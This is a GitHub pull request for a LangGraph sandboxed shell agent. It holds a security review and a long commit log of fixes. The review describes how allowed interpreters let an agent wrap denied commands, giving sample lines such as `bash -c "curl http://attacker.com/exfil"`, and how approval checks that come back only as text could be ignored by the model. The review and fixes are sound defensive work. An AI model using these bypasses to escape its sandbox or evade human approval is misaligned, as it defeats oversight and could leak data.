feat: add sandbox_agent with per-context workspace isolation#126

Draft
Ladas wants to merge 203 commits into kagenti:main from Ladas:feat/sandbox-agent

Conversation

Ladas (Contributor) commented Feb 17, 2026

Summary

  • New sandbox_agent LangGraph agent with sandboxed shell execution
  • settings.json three-tier permission checker (allow/deny/HITL)
  • sources.json capability declaration (registries, remotes, runtime limits)
  • Per-context workspace manager on shared RWX PVC
  • Sandbox executor with timeout enforcement
  • Shell, file_read, file_write tools for LangGraph
  • A2A server with streaming support

Tests

68 unit tests passing (permissions, sources, workspace, executor, graph)

Design Doc

See docs/plans/2026-02-14-agent-context-isolation-design.md in kagenti/kagenti repo

🤖 Generated with Claude Code

pdettori (Contributor) left a comment


Security & Completeness Review

Four issues identified — two security-critical and two enforcement gaps. Details in inline comments below.

"shell(tree:*)", "shell(pwd:*)", "shell(mkdir:*)", "shell(cp:*)",
"shell(mv:*)", "shell(touch:*)",
"shell(python:*)", "shell(python3:*)", "shell(pip install:*)",
"shell(pip list:*)", "shell(sh:*)", "shell(bash:*)",

🔴 Critical: Shell interpreter allow-rules bypass all deny rules

The allow list grants shell(bash:*), shell(sh:*), shell(python:*), and shell(python3:*) unconditionally. Because _match_shell() in permissions.py performs prefix-only matching on the command string, a command like:

bash -c "curl http://attacker.com/exfil"
python3 -c "import subprocess; subprocess.run(['curl', ...])"

will match shell(bash:*) / shell(python3:*) in the allow list, while the deny rules shell(curl:*) and shell(wget:*) only match commands that start with curl or wget. The network(outbound:*) deny rule is typed as network, but the executor only ever calls permission_checker.check("shell", operation) — there is no code path that checks outbound network at the OS/syscall level.

This is a complete sandbox escape: any denied command can be trivially executed as a subprocess of an allowed interpreter.

Suggested fix: Either (a) remove bash/sh/python/python3 from the blanket allow-list and whitelist specific scripts instead, or (b) add recursive argument inspection in _match_shell() for interpreter commands (detecting -c flags, pipe chains, etc.), or (c) use OS-level enforcement (seccomp, network policies) as a second layer.
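Suggestion (b) can be sketched as follows. This is a minimal illustration, not the project's `_match_shell()`: the interpreter set and deny list are inlined assumptions, and a production version would also need to handle pipes, `&&`/`;` chains, stdin scripts, and `python -m`:

```python
from __future__ import annotations

import shlex

INTERPRETERS = {"bash", "sh", "python", "python3"}
DENY_PREFIXES = ("curl", "wget")  # models the shell(curl:*) / shell(wget:*) deny rules


def embedded_command(command: str) -> str | None:
    """Return the string passed via -c to a known interpreter, if any."""
    try:
        tokens = shlex.split(command)
    except ValueError:
        return None  # unparseable input should be rejected upstream
    if not tokens or tokens[0] not in INTERPRETERS:
        return None
    for i, tok in enumerate(tokens[:-1]):
        if tok == "-c":
            return tokens[i + 1]
    return None


def is_denied(command: str) -> bool:
    """Prefix match plus recursive unwrapping of interpreter wrappers."""
    if command.strip().startswith(DENY_PREFIXES):
        return True
    inner = embedded_command(command)
    # Recurse so nested wrappers (bash -c "sh -c '...'") are also caught.
    return inner is not None and is_denied(inner)
```

Note that argument inspection alone still misses payloads like `python3 -c "import subprocess; ..."`, which is why option (c), OS-level enforcement, remains worthwhile as a second layer.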

try:
result = await executor.run_shell(command)
except HitlRequired as exc:
return f"APPROVAL_REQUIRED: command '{exc.command}' needs human approval."

🔴 Critical: HITL has no hard interrupt — LLM can bypass approval

The HitlRequired exception is caught here and converted to a plain string ("APPROVAL_REQUIRED: ...") returned to the LLM. There is no interrupt() call (LangGraph's mechanism for pausing the graph and requiring human input). The graph construction in build_graph() uses tools_condition and ToolNode but never calls interrupt().

This means the agent loop continues after receiving this string, and the LLM is free to:

  1. Ignore the approval message entirely
  2. Attempt a workaround command (e.g., rewriting the denied command using an allowed shell interpreter — see Issue 1)
  3. Simply not relay the approval request to the user

The docstrings in executor.py and permissions.py state that HITL "triggers LangGraph interrupt() for human approval," but the actual implementation relies on LLM self-reporting. This is not a security control — it is advisory at best.

Suggested fix: Replace the except HitlRequired handler with a proper LangGraph interrupt() call that pauses the graph execution and requires explicit human approval before resuming.
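The control-flow difference can be illustrated without the real stack. In this dependency-free sketch the interrupt is modeled as an exception that unwinds out of the agent loop; LangGraph's actual `interrupt()` similarly suspends the graph and only resumes when the client supplies a `Command(resume=...)` value. The HITL rule and all names here are invented for the demo:

```python
from __future__ import annotations


class GraphInterrupt(Exception):
    """Stand-in for LangGraph's graph-pausing interrupt()."""

    def __init__(self, payload: dict):
        super().__init__(payload)
        self.payload = payload


def shell_tool(command: str, resume_value: dict | None = None) -> str:
    # Assumed HITL rule for the demo: destructive commands need approval.
    needs_hitl = command.startswith("rm ")
    if needs_hitl and resume_value is None:
        # Hard stop: control leaves the agent loop entirely, so the LLM
        # never sees an "APPROVAL_REQUIRED" string it could ignore.
        raise GraphInterrupt({"command": command, "action": "approve?"})
    if needs_hitl and not (isinstance(resume_value, dict) and resume_value.get("approved")):
        # isinstance guard also catches None/malformed resume values.
        return f"DENIED: {command}"
    return f"EXECUTED: {command}"
```

The key property is that approval is enforced by the runtime, not by the model's willingness to relay a string.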

self.ttl_days = ttl_days

# ------------------------------------------------------------------
# Public API

🔴 No TTL enforcement or workspace cleanup

ttl_days is accepted here and written into .context.json metadata (line 91), but there is no implementation that ever reads this value back or acts on it. Specifically:

  • No cleanup job, eviction logic, or scheduled task
  • No delete_workspace() method exists
  • No comparison of created_at + ttl_days against current time
  • disk_usage_bytes is tracked passively but never checked against any quota
  • The only public methods are get_workspace_path(), ensure_workspace(), and list_contexts()

On a shared RWX PVC in a multi-tenant Kubernetes environment, this means workspaces accumulate indefinitely, creating both a resource exhaustion risk and a data retention compliance gap.

Suggested fix: Either (a) implement a cleanup_expired() method and wire it into a CronJob or startup hook, or (b) explicitly document ttl_days as advisory/future-only and add a tracking issue for enforcement.
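A `cleanup_expired()` along the lines of option (a) might look like this. It assumes, per the review, that each workspace directory holds a `.context.json` with `created_at` (epoch seconds) and `ttl_days`; the real metadata schema may differ:

```python
from __future__ import annotations

import json
import shutil
import time
from pathlib import Path


def cleanup_expired(root: Path, now: float | None = None) -> list[str]:
    """Delete workspaces whose created_at + ttl_days lies in the past."""
    now = time.time() if now is None else now
    removed: list[str] = []
    for meta_file in root.glob("*/.context.json"):
        meta = json.loads(meta_file.read_text())
        expires_at = meta["created_at"] + meta["ttl_days"] * 86400
        if now >= expires_at:
            shutil.rmtree(meta_file.parent)  # drop the whole workspace dir
            removed.append(meta_file.parent.name)
    return sorted(removed)
```

Wired into a Kubernetes CronJob or a startup hook, this bounds both disk growth and data retention on the shared PVC.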

entry = managers.get(manager)
if entry is None:
return False
blocked: list[str] = entry.get("blocked_packages", [])

🟡 is_package_blocked() and is_git_remote_allowed() are never called in production code

These methods (and is_package_manager_enabled()) are defined and unit-tested but never wired into the executor or graph. In production code, only the following SourcesConfig members are used:

  • is_web_access_enabled() — called in graph.py:_make_web_fetch_tool
  • is_domain_allowed() — called in graph.py:_make_web_fetch_tool
  • max_execution_time_seconds — used in executor.py:_execute

This means:

  • pip install <blocked-package> will succeed if shell(pip install:*) is in the allow list — the blocked_packages list in sources.json is never consulted
  • git clone <disallowed-remote> will succeed if shell(git clone:*) is in the allow list — allowed_remotes in sources.json is never checked
  • max_memory_mb is also defined but never enforced

The sources.json capability layer was clearly designed as a second enforcement layer, but it is not wired up to the shell execution path.

Suggested fix: Either (a) add pre-execution hooks in the executor that call is_package_blocked() / is_git_remote_allowed() for matching commands, or (b) explicitly document these as "advisory only / planned for future iteration" and file tracking issues.
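A pre-execution hook in the spirit of option (a) could be as small as this. Policy data is inlined here for illustration; in the real agent it would come from `sources.json` via the SourcesConfig methods named above:

```python
from __future__ import annotations

import shlex

BLOCKED_PACKAGES = {"evil-pkg"}  # assumed blocked_packages entry
ALLOWED_REMOTES = ("https://github.com/kagenti/",)  # assumed allowed_remotes entry


def check_sources(command: str) -> str | None:
    """Return a denial reason if the command violates source policy, else None."""
    tokens = shlex.split(command)
    if tokens[:2] == ["pip", "install"]:
        for pkg in tokens[2:]:
            if not pkg.startswith("-") and pkg in BLOCKED_PACKAGES:
                return f"package '{pkg}' is in blocked_packages"
    if tokens[:2] == ["git", "clone"]:
        urls = [t for t in tokens[2:] if not t.startswith("-")]
        if urls and not urls[0].startswith(ALLOWED_REMOTES):
            return f"remote '{urls[0]}' not in allowed_remotes"
    return None
```

The executor would call this before spawning the subprocess and refuse to run on a non-None result.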

@Ladas Ladas force-pushed the feat/sandbox-agent branch from 04f7cd5 to 2816bd3 on February 25, 2026 at 10:05
Ladas added a commit to Ladas/agent-examples that referenced this pull request Feb 25, 2026
…L cleanup, sources enforcement

Address all 4 security findings from pdettori's review on PR kagenti#126:

1. Shell interpreter bypass (Critical): Add recursive argument inspection
   in PermissionChecker.check_interpreter_bypass() to detect -c/-e flags
   in bash/sh/python invocations. Embedded commands are checked against
   deny rules, preventing `bash -c "curl ..."` from bypassing `shell(curl:*)`
   deny rules.

2. HITL no interrupt() (Critical): Replace `except HitlRequired` string
   return with LangGraph `interrupt()` call that pauses graph execution.
   The agent cannot continue until a human explicitly approves via the
   HITLManager channel.

3. No TTL enforcement (Medium): Add `cleanup_expired()` method to
   WorkspaceManager. Reads created_at + ttl_days from .context.json and
   deletes expired workspace directories. Add `get_total_disk_usage()`.

4. sources.json not wired (Medium): Add `_check_sources()` pre-hook in
   SandboxExecutor.run_shell(). Checks pip/npm install commands against
   blocked_packages list and git clone URLs against allowed_remotes
   before execution.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Ladas and others added 19 commits February 26, 2026 16:06
Weather agent with ONLY auto-instrumentation - no custom middleware,
no observability.py, no root span creation. The AuthBridge ext_proc
creates the root span with all MLflow/OpenInference/GenAI attributes.

Agent changes from pre-PR-114 baseline:
- __init__.py: Add W3C Trace Context propagation + OpenAI auto-instr
- agent.py: Remove duplicate LangChainInstrumentor (moved to __init__)
- pyproject.toml: Add opentelemetry-instrumentation-openai
- Dockerfile: Use Docker Hub base image (GHCR auth fix)

Zero custom observability code - all root span attributes come from
the AuthBridge ext_proc gRPC server.

Refs kagenti/kagenti#667

Signed-off-by: Ladas <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without ASGI/Starlette instrumentation, the agent's OTEL SDK never
reads the traceparent header from incoming HTTP requests. This causes
the AuthBridge ext_proc root span and agent LangChain spans to end
up in separate disconnected traces.

StarletteInstrumentor().instrument() patches Starlette to automatically
extract traceparent from incoming requests, making all agent spans
children of the ext_proc root span (same trace_id).

Refs kagenti/kagenti#667

Signed-off-by: Ladas <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
New LangGraph agent with:
- settings.json three-tier permission checker (allow/deny/HITL)
- sources.json capability declaration (registries, remotes, limits)
- Per-context workspace manager on shared RWX PVC
- Sandbox executor with timeout enforcement
- Shell, file_read, file_write tools for LangGraph
- A2A server with streaming support

68 tests passing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agents can now fetch content from URLs whose domain is in the
sources.json allowed_domains list (github.com, api.github.com, etc).
Blocked domains are checked first. HTML content is stripped to text.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Serialize LangChain messages via model_dump() and json.dumps() instead
of Python str(). This produces valid JSON that the ext_proc can parse
to extract GenAI semantic convention attributes (token counts, model
name, tool names) without regex.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Without a checkpointer, LangGraph discards conversation state between
invocations even when the same context_id/thread_id is used. This adds
a shared MemorySaver instance to SandboxAgentExecutor and passes the
thread_id config to graph.astream() so the checkpointer can route state
per conversation thread.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
C19 (multi-conversation isolation):
- Add startup cleanup of expired workspaces via cleanup_expired()
- Wire context_ttl_days from Configuration into WorkspaceManager

C20 (sub-agent spawning via LangGraph):
- Add subagents.py with two spawning modes:
  - explore: in-process read-only sub-graph (grep, read_file, list_files)
    bounded to 15 iterations, 120s timeout
  - delegate: out-of-process SandboxClaim stub for production K8s clusters
- Wire explore and delegate tools into the main agent graph
- Update system prompt with sub-agent tool descriptions

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Address code review findings:

1. Interpreter bypass now routes to HITL when embedded commands are not
   explicitly denied — prevents auto-allowing unknown commands wrapped
   in bash -c / sh -c via the outer shell(bash:*) allow rule.

2. Parse &&, ||, ; shell metacharacters in embedded commands, not just
   pipes. Catches "bash -c 'allowed && curl evil.com'" patterns.

3. Replace str().startswith() path traversal checks with
   Path.is_relative_to() across graph.py and subagents.py to prevent
   prefix collision attacks (/workspace vs /workspace-evil).

4. Guard against None approval in interrupt() resume — use
   isinstance(approval, dict) check.
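Item 3's prefix-collision problem is easy to demonstrate (Python 3.9+; paths are illustrative):

```python
from pathlib import Path

workspace = Path("/workspace")
evil = Path("/workspace-evil/data")  # sibling dir sharing the string prefix
inside = Path("/workspace/data")

# str().startswith() compares characters, so the sibling wrongly passes:
assert str(evil).startswith(str(workspace))

# Path.is_relative_to() compares path components and rejects it:
assert not evil.is_relative_to(workspace)
assert inside.is_relative_to(workspace)
```

In sandbox code, both paths should also be `resolve()`d first so `..` segments and symlinks cannot re-escape the workspace.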

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Add langgraph-checkpoint-postgres and asyncpg dependencies. Agent uses
AsyncPostgresSaver when CHECKPOINT_DB_URL is set, falls back to
in-memory MemorySaver for dev/test without Postgres.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Replace InMemoryTaskStore with a2a-sdk's DatabaseTaskStore (PostgreSQL)
when TASK_STORE_DB_URL is set. This is A2A-generic — works for any
agent framework (LangGraph, CrewAI, AG2), not just LangGraph.

The A2A SDK persists tasks, messages, artifacts, and contextId at the
protocol level. Any A2A agent can adopt this with the same env var.

Falls back to InMemoryTaskStore when no DB URL is configured.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Update the A2A agent card name, skill ID, and workspace agent_name
from sandbox-assistant/Sandbox Assistant to sandbox-legion/Sandbox Legion.

The Python package name (sandbox_agent) stays unchanged as it's an
implementation detail, not user-facing.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The DatabaseTaskStore is in a2a.server.tasks, not
a2a.server.tasks.sql_store. The incorrect import path
caused the agent to silently fall back to InMemoryTaskStore.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
AsyncPostgresSaver.from_conn_string() returns a context manager
that can't be used in sync __init__. Instead, create an asyncpg
pool and initialize the saver lazily in execute() on first call.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Both asyncpg pool (checkpointer) and SQLAlchemy engine (TaskStore)
need SSL disabled when connecting to the in-cluster postgres-sessions
StatefulSet which doesn't have TLS configured.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph's AsyncPostgresSaver uses psycopg3, not asyncpg.
Create AsyncConnectionPool from psycopg_pool and pass to saver.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The from_conn_string context manager properly handles connection
pool setup and autocommit for CREATE INDEX CONCURRENTLY.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
@Ladas Ladas force-pushed the feat/sandbox-agent branch from ac7ba86 to 36cfc18 on February 26, 2026 at 15:06
Ladas and others added 5 commits February 26, 2026 18:42
When models like gpt-4o-mini return content as a list of content blocks
(text + tool_use), the previous code would stringify the entire list.
Now properly extracts only text-type blocks for the final artifact.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Per-context_id asyncio.Lock serializes graph execution for same
  conversation (prevents stuck submitted tasks from concurrent requests)
- Shell interpreter bypass detection: catches bash -c/python -c
  patterns and recursively checks inner commands against permissions
  and sources policy
- TOFU verification on startup: hashes CLAUDE.md/sources.json,
  warns on mismatch (non-blocking)
- HITL interrupt() design documented in graph.py with implementation
  roadmap for graph-level approval flow
- Lock cleanup when >1000 idle entries to prevent memory leaks
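The per-context lock with bounded growth described above might look like this dependency-free sketch (class name and threshold are invented for illustration):

```python
from __future__ import annotations

import asyncio


class ContextLocks:
    """One asyncio.Lock per context_id, with opportunistic pruning."""

    def __init__(self, max_idle: int = 1000):
        self._locks: dict[str, asyncio.Lock] = {}
        self._max_idle = max_idle

    def get(self, context_id: str) -> asyncio.Lock:
        if len(self._locks) > self._max_idle:
            # Drop entries nobody currently holds; held locks survive.
            self._locks = {k: v for k, v in self._locks.items() if v.locked()}
        return self._locks.setdefault(context_id, asyncio.Lock())
```

The executor would wrap each graph invocation in `async with locks.get(context_id):` so concurrent requests for the same conversation serialize instead of leaving tasks stuck in `submitted`.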

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Agent now emits structured JSON events instead of Python str()/repr().
Each graph event is serialized with type, tools/name/content fields.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…sk history

Agent serializer: when LLM calls tools, also emit its reasoning text
as a separate llm_response event before the tool_call. This shows the
full chain: thinking → tool_call → tool_result → response.

Backend history: aggregate messages across ALL task records for the
same context_id. A2A protocol creates immutable tasks per message
exchange, so a multi-turn session has N task records. We now merge
them in order with user message deduplication.

Co-Authored-By: Claude Opus 4.6 (1M context) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…nnections

Stale asyncpg connections caused 'connection was closed in the middle
of operation' errors, breaking SSE streams. Now connections are recycled
every 5 min and verified before use.

Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Ladas added 30 commits March 13, 2026 23:22
Instead of one reflection prompt at the end, inject a HumanMessage
after every ToolMessage in the executor's context window:

  AIMessage(tool_call: shell(gh run list --head ...))
  ToolMessage("STDERR: unknown flag: --head\nEXIT_CODE: 1")
  HumanMessage("Tool 'shell' call 1 FAILED. Error: unknown flag.
    Goal: 'List CI failures'. Try DIFFERENT approach. NEVER repeat.")

  AIMessage(tool_call: shell(gh run list --branch main))
  ToolMessage("completed  failure  feat: Enable UI...  18762918767")
  HumanMessage("Tool 'shell' call 2 OK. Goal: 'List CI failures'
    — if ACHIEVED → stop. NEVER repeat same command.")

This forces the LLM to reflect after each result, preventing the
loop of 10x identical shell(gh run list) calls.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- List INVALID flags explicitly: --head, --head-ref, --pr, --pull-request
- Add gh pr checks <number> to reference
- Reflection prompt after "unknown flag" error tells LLM to run --help
- Suggest using --branch or gh pr checks instead of invented flags

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…mpts

Move gh CLI flag reference out of generic executor prompt — belongs
in rca:ci skill. Keep only generic guidelines: run --help on unknown
flags, check stderr, don't repeat same result.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When iteration > 1, the planner serializer emits replanner_output
instead of planner_output. This lets the UI render replan as a
distinct node (not replacing the initial plan).

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
The executor→tools→executor cycle is one logical unit. Don't
increment node_visit when the same node type re-enters (executor
after tools returns to executor). Only increment on node TYPE
transitions (executor→reflector, reflector→planner, etc).

This groups all tool calls + micro-reasonings for one plan step
under a single collapsible UI section.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Remove tool_choice="any" — use implicit auto (field omitted).
Per vllm-tool-choice-auto-issue.md research, implicit auto gives
best results for Llama 4 Scout (100% structured) and allows the
model to produce text-only reasoning responses when the step is
complete, instead of forcing a tool call every time.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Testing explicit auto vs implicit (omitted) vs any. The research
doc shows explicit and implicit auto can behave differently.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Extract tool schemas from LLM's RunnableBinding and include in
LLMCallCapture.debug_fields(). The UI prompt inspector now shows
exactly which tools the LLM received alongside the messages.

Removes duplicate _bound_tools capture from executor node.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
TESTED both explicit and implicit auto with Llama 4 Scout:
- Implicit auto: 0/54 structured tool_calls (all text-in-content)
- Explicit auto: 0/58 structured tool_calls (all text-in-content)
- Any/required: 100% structured tool_calls

The vLLM endpoint does not produce structured tool_calls with auto
for Llama 4 Scout. "any" forces JSON schema constraint at decoding.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Connect the wizard "Force Tool Calling" toggle to the graph's
tool_choice setting. When SANDBOX_FORCE_TOOL_CHOICE=1 (default
from wizard), executor uses tool_choice="any" (structured calls).
When =0, uses implicit auto (model chooses text or tools).

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When SANDBOX_FORCE_TOOL_CHOICE=1:
  Phase 1: LLM with implicit auto → text reasoning about what to do
  Phase 2: LLM with tool_choice="any" → structured tool call

The reasoning from Phase 1 becomes the micro_reasoning content
(real text, not just "Decided next action: → shell(...)").

Also: skip first SystemMessage in _summarize_messages (already
shown as _system_prompt — was appearing twice in UI).

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
With tools bound, Llama 4 Scout always produces structured tool_calls
even with implicit auto — defeating the two-phase purpose. Fix: Phase 1
uses bare LLM (no bind_tools) which forces text-only output.

Phase 2 always runs with tool_choice="any" for structured calls.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Remove plan, plan_step, reflection legacy aliases from:
- Serializer: no longer emits duplicate events
- Post-processing: no legacy type special handling
- Tests: 6 legacy tests removed

Each event type has one canonical name only:
  planner_output, executor_step, tool_call, tool_result,
  micro_reasoning, reflector_decision, reporter_output,
  step_selector, budget_update, replanner_output

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
When _no_tool_count >= 2, the executor was discarding the actual LLM
response (with text reasoning) and replacing it with a hardcoded
failure message. Now preserves the model's output for micro_reasoning
display and includes capture.debug_fields() for prompt inspector.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- invoke_with_tool_loop: up to THINKING_ITERATION_BUDGET (default 5) bare
  LLM iterations before each micro-reasoning tool call
- Each thinking iteration sees tool descriptions as text + previous
  thinking history (ephemeral, not in LangGraph state)
- MAX_THINK_ACT_CYCLES replaces MAX_TOOL_CALLS_PER_STEP (counts full
  think→act loops, not individual tool calls)
- MAX_PARALLEL_TOOL_CALLS (default 5) allows parallel tool execution
- Sub-events emitted as 'thinking' type with full prompt debug data
- Serializer annotates micro_reasoning with thinking_count for UI badge
- All LLM nodes (planner, executor, reflector, reporter) use invoke_llm
  with workspace preamble and bound_tools capture

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
StepSelector imported _format_llm_response from reasoning.py which was
removed during the P0 unified invoke_llm refactoring. Replace with
LLMCallCapture._format_response() from context_builders.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
LangGraph stream_mode="updates" only includes keys defined in the
state schema. _sub_events (thinking iterations) was missing from
SandboxState, so thinking events were silently dropped from the
stream and never reached the serializer or UI.

Also adds _last_tool_result, _bound_tools, _llm_response to state
for consistent debug data availability.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- step_done tool: LLM calls it when step is complete, intercepted in
  invoke_with_tool_loop to return text-only (no forced tool call)
- Fix double WORKSPACE_PREAMBLE: skip preamble in thinking/micro-reasoning
  calls since messages already have it from build_executor_context
- Remove duplicate tool descriptions injection (executor prompt has them)
- Truncate thinking history to 200 chars per iteration (save tokens)
- Micro-reasoning calls ONE tool (not up to 5)

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- Thinking prompts: "2-3 sentences max" instead of verbose reasoning
- Micro-reasoning: parallel tools only for independent operations
- Never call same tool twice with similar args
- step_done for completed steps

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Indexed hash of indexed hashes for main steps and subplans:
- create_plan: initial plan with subplan "a" per step
- add_steps: replanner-only, requires all existing steps terminal
- add_alternative_subplan: creates subplan b/c/d for failed steps
- Status transitions: pending → running → done|failed|cancelled (one-way)
- to_flat_plan/to_flat_plan_steps: backward compat conversions
- 30 unit tests covering all operations and invariants

Not yet wired into reasoning nodes — next session will integrate.
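A stripped-down sketch of that structure (method names follow the commit message; internals and the transition rule encoding are assumptions):

```python
from __future__ import annotations

ORDER = {"pending": 0, "running": 1, "done": 2, "failed": 2, "cancelled": 2}
TERMINAL = {"done", "failed", "cancelled"}


class PlanStore:
    """Dict of main steps, each holding a dict of subplans ('a', 'b', ...)."""

    def __init__(self) -> None:
        self.steps: dict[int, dict[str, dict]] = {}

    def create_plan(self, descriptions: list[str]) -> None:
        self.steps = {
            i: {"a": {"desc": d, "status": "pending"}}
            for i, d in enumerate(descriptions)
        }

    def set_step_status(self, step: int, subplan: str, status: str) -> None:
        entry = self.steps[step][subplan]
        cur = entry["status"]
        # One-way transitions: terminal states are final, no moving backward.
        if cur in TERMINAL or ORDER[status] < ORDER[cur]:
            raise ValueError(f"illegal transition {cur} -> {status}")
        entry["status"] = status

    def add_alternative_subplan(self, step: int, desc: str) -> str:
        # Next subplan letter (b, c, d, ...) for a failed step.
        key = chr(ord("a") + len(self.steps[step]))
        self.steps[step][key] = {"desc": desc, "status": "pending"}
        return key
```

The invariant the tests exercise is that a failed subplan can never be revived; recovery goes through a fresh alternative subplan instead.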

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
- planner_node: creates PlanStore via ps.create_plan() alongside flat plan
- reflector_node: updates PlanStore step status on continue/done/replan/retry
- reporter_node: reads plan from PlanStore (falls back to flat plan)
- step_selector: marks current PlanStore step as running
- SandboxState: adds _plan_store dict field
- event_serializer: enriches planner/reflector events with PlanStore data
- Fixes variable shadowing of ps module import (ps -> _ps, cur_ps, etc.)
- Wraps set_step_status in try/except for replan key mismatches
- _force_done() now propagates _plan_store to prevent state loss

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
Rename local `ps = plan_steps[current_step]` to `step_entry` in
_serialize step_selector branch to avoid shadowing the plan_store
module import.

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…inking tuning

- Reflector: increase max pairs from 3 to 10, add step execution summary
  (tool calls, tools used, error count) to reflector system prompt
- Reporter: add thinking+tool loop with read-only tools (file_read, grep,
  glob) for file verification. Extract files_touched from tool history.
- Prompt visibility: add _prompt_messages to executor edge cases (cycle
  limit, budget exceeded) and step_selector for complete UI debug info
- Thinking tuning: MAX_THINK_ACT_CYCLES 10→20, THINKING_ITERATION_BUDGET 5→2
- Event serializer: include files_touched in reporter_output events
- Update reflector context tests for new 10-pair limit

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
Signed-off-by: Ladislav Smola <lsmola@redhat.com>
…ernally

- invoke_with_tool_loop now supports max_cycles + tools parameters
- When tools provided: executes tools via asyncio.gather (parallel),
  feeds results back, loops for next think-act cycle
- Any node can use the full loop (not just executor via graph topology)
- Reporter uses max_cycles=3 with read-only tools for file verification
- Removed reporter_tools graph node (tools run inside invoke_with_tool_loop)
- MAX_THINK_ACT_CYCLES default raised to 20

Assisted-By: Claude (Anthropic AI) <noreply@anthropic.com>
